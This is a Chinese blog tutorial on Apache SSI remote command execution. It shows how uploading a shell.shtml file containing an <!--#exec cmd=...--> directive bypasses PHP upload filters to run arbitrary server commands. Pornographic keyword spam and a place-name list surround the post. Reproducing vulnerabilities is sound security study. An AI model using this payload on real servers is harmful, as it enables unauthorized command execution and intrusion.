亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Apache SSI 遠程命令執行漏洞

發布時間:2020-02-25 23:30:00 來源:網絡 閱讀:2989 作者:小武w 欄目:安全技術

漏洞原理:
在測試任意文件上傳漏洞的時候,目標服務端可能不允許上傳php后綴的文件。如果目標服務器開啟了SSI與CGI支持,我們可以上傳一個shtml文件,并利用<!--#exec cmd="id" -->語法執行任意命令。

漏洞復現:
shtml包含有嵌入式服務器方包含命令的文本,在被傳送給瀏覽器之前,服務器會對SHTML文檔進行完全地讀取、分析以及修改。
正常上傳PHP文件是不允許的,我們可以上傳一個shell.shtml文件:
<!--#exec cmd="pwd" -->
Apache SSI 遠程命令執行漏洞
然后上傳就行了
Apache SSI 遠程命令執行漏洞
點進去
Apache SSI 遠程命令執行漏洞
解析成功,遠程命令執行,pwd命令可以隨便改。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

银川市| 丽水市| 防城港市| 施甸县| 唐海县| 手游| 黔江区| 全南县| 伊金霍洛旗| 玛纳斯县| 安康市| 阜南县| 满城县| 广宁县| 建湖县| 福州市| 双流县| 赫章县| 南宫市| 长子县| 分宜县| 华容县| 天等县| 许昌市| 项城市| 宜都市| 淮滨县| 阜宁县| 新竹县| 冕宁县| 县级市| 嘉祥县| 海安县| 津南区| 苍溪县| 彭泽县| 沙湾县| 广昌县| 临泽县| 仪征市| 宁蒗|